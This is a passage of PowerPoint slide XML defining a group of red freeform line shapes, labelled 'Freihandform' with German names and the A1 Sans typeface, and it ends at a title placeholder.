                  <a:moveTo>
                    <a:pt x="1" y="107998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-312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98" name="Freihandform: Form 397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1679F404-BC27-496F-B511-E75FD9D9D628}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10097803" y="458731"/>
              <a:ext cx="23469" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107772 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3070 h 110842"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110842">
                  <a:moveTo>
                    <a:pt x="1" y="107772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-307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399" name="Freihandform: Form 398">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43285943-C4B7-46AB-AFF2-3BF6ADAAD873}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10097850" y="-361295"/>
              <a:ext cx="23469" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 218745 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3128 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="221873">
                  <a:moveTo>
                    <a:pt x="1" y="218745"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-312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400" name="Freihandform: Form 399">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DECCE629-2034-49C6-9EC2-33C983C1705F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10570896" y="731841"/>
              <a:ext cx="236498" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ 52414 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 95984 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ -3053 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="52414"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95984" y="-3053"/>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401" name="Freihandform: Form 400">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22DC1F3-314F-41B3-A99F-43DC3046614E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10570874" y="458731"/>
              <a:ext cx="236286" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95899 w 95897"/>
                <a:gd name="connsiteY0" fmla="*/ -3076 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95897"/>
                <a:gd name="connsiteY1" fmla="*/ 52298 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95897" h="55373">
                  <a:moveTo>
                    <a:pt x="95899" y="-3076"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="52298"/>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402" name="Freihandform: Form 401">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F897ADC-9FBE-453E-A882-C7C95777A822}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11043661" y="185156"/>
              <a:ext cx="236804" cy="136907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96107"/>
                <a:gd name="connsiteY0" fmla="*/ 52465 h 55564"/>
                <a:gd name="connsiteX1" fmla="*/ 96108 w 96107"/>
                <a:gd name="connsiteY1" fmla="*/ -3099 h 55564"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96107" h="55564">
                  <a:moveTo>
                    <a:pt x="1" y="52465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96108" y="-3099"/>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403" name="Freihandform: Form 402">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5826551-7B16-4ECA-9B9A-6B0D4AD19A01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11043708" y="-87954"/>
              <a:ext cx="236804" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96107"/>
                <a:gd name="connsiteY0" fmla="*/ 52346 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96108 w 96107"/>
                <a:gd name="connsiteY1" fmla="*/ -3123 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96107" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="52346"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96108" y="-3123"/>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404" name="Freihandform: Form 403">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE547BDC-0179-4578-95B1-009EAEFDA675}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9388281" y="1278526"/>
              <a:ext cx="236520" cy="136432"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ -3006 h 55371"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 52365 h 55371"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55371">
                  <a:moveTo>
                    <a:pt x="1" y="-3006"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52365"/>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405" name="Freihandform: Form 404">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCCE9EE3-6C4D-4B1B-A18C-FDB2D035D6C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9151783" y="595168"/>
              <a:ext cx="236617" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96031"/>
                <a:gd name="connsiteY0" fmla="*/ 163357 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96031"/>
                <a:gd name="connsiteY1" fmla="*/ 52422 h 221873"/>
                <a:gd name="connsiteX2" fmla="*/ 95984 w 96031"/>
                <a:gd name="connsiteY2" fmla="*/ -3047 h 221873"/>
                <a:gd name="connsiteX3" fmla="*/ 96032 w 96031"/>
                <a:gd name="connsiteY3" fmla="*/ 218826 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96031" h="221873">
                  <a:moveTo>
                    <a:pt x="1" y="163357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="52422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95984" y="-3047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96032" y="218826"/>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406" name="Freihandform: Form 405">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94A2D525-66D5-462B-A9BE-376F86F891A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9151783" y="595168"/>
              <a:ext cx="236617" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96031"/>
                <a:gd name="connsiteY0" fmla="*/ -3064 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96032 w 96031"/>
                <a:gd name="connsiteY1" fmla="*/ 52405 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96031" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-3064"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96032" y="52405"/>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687" name="Freihandform: Form 686">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F38D0A4F-F16D-49EA-9D49-71DE12F067E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10334797" y="1552806"/>
              <a:ext cx="236052" cy="135495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95802"/>
                <a:gd name="connsiteY0" fmla="*/ -2983 h 54991"/>
                <a:gd name="connsiteX1" fmla="*/ 95803 w 95802"/>
                <a:gd name="connsiteY1" fmla="*/ 52009 h 54991"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95802" h="54991">
                  <a:moveTo>
                    <a:pt x="1" y="-2983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95803" y="52009"/>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688" name="Freihandform: Form 687">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC4A8EE4-DB76-4E4E-9879-1A417C222F00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10807818" y="1688304"/>
              <a:ext cx="236567" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96011"/>
                <a:gd name="connsiteY0" fmla="*/ 52498 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96011"/>
                <a:gd name="connsiteY1" fmla="*/ -2971 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96011" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="52498"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="-2971"/>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694" name="Freihandform: Form 693">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0051C24-C351-4FBB-A2E6-48D9F5474A7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6314000" y="1687366"/>
              <a:ext cx="236570" cy="137612"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96012"/>
                <a:gd name="connsiteY0" fmla="*/ -2971 h 55850"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY1" fmla="*/ 52879 h 55850"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96012" h="55850">
                  <a:moveTo>
                    <a:pt x="1" y="-2971"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="52879"/>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695" name="Freihandform: Form 694">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4886FC-530A-43D5-959D-220F73B57786}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6787095" y="1823802"/>
              <a:ext cx="236567" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96011"/>
                <a:gd name="connsiteY0" fmla="*/ 52507 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96011"/>
                <a:gd name="connsiteY1" fmla="*/ -2960 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96011" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="52507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="-296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696" name="Freihandform: Form 695">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20A37F76-9F35-4274-8DBC-12A8155D2F79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7969415" y="2369080"/>
              <a:ext cx="236474" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY0" fmla="*/ -2867 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY1" fmla="*/ 52600 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95973" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="-2867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="5260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697" name="Freihandform: Form 696">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C5CD372-A550-4B57-953B-3F301E038B63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11988216" y="2236195"/>
              <a:ext cx="236474" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY0" fmla="*/ -2867 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY1" fmla="*/ 52600 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95973" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="-2867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="5260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699" name="Freihandform: Form 698">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ADA4C95-BA03-45A8-9984-99EF3A14FF61}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8443641" y="2780271"/>
              <a:ext cx="236545" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96002"/>
                <a:gd name="connsiteY0" fmla="*/ 52507 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 96004 w 96002"/>
                <a:gd name="connsiteY1" fmla="*/ -2960 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96002" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="52507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96004" y="-2960"/>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700" name="Freihandform: Form 699">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6C6BC8-957C-4BC8-9260-BCA324E400A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7025887" y="2094411"/>
              <a:ext cx="236567" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96011"/>
                <a:gd name="connsiteY0" fmla="*/ -2983 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 96013 w 96011"/>
                <a:gd name="connsiteY1" fmla="*/ 52486 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96011" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-2983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96013" y="52486"/>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707" name="Freihandform: Form 706">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B719C2-2138-4AD3-AF33-2633E822AA24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4894934" y="-93593"/>
              <a:ext cx="23469" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107833 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3105 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="107833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3105"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="7102" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F10000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="de-DE">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="709" name="Freihandform: Form 708">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB57BB5-6B17-4B00-B780-D637D6B8E34A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624350" y="1681454"/>
              <a:ext cx="472950" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191949 w 191947"/>
                <a:gd name="connsiteY0" fmla="*/ 52466 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 95965 w 191947"/>
                <a:gd name="connsiteY1" fmla="*/ -2907 h 110842"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 191947"/>
                <a:gd name="connsiteY2" fmla="*/ 52562 h 110842"/>
                <a:gd name="connsiteX3" fmla="*/ 95965 w 191947"/>
                <a:gd name="connsiteY3" fmla="*/ 107935 h 110842"/>
                <a:gd name="connsiteX4" fmla="*/ 191949 w 191947"/>
                <a:gd name="connsiteY4" fmla="*/ 52466 h 110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47" h="110842">
                  <a:moveTo>
                    <a:pt x="191949" y="52466"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95965" y="-2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95965" y="107935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191949" y="52466"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="7102" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F10000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="de-DE">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63194F4A-212B-4FB5-B826-5F7FA3B9217C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
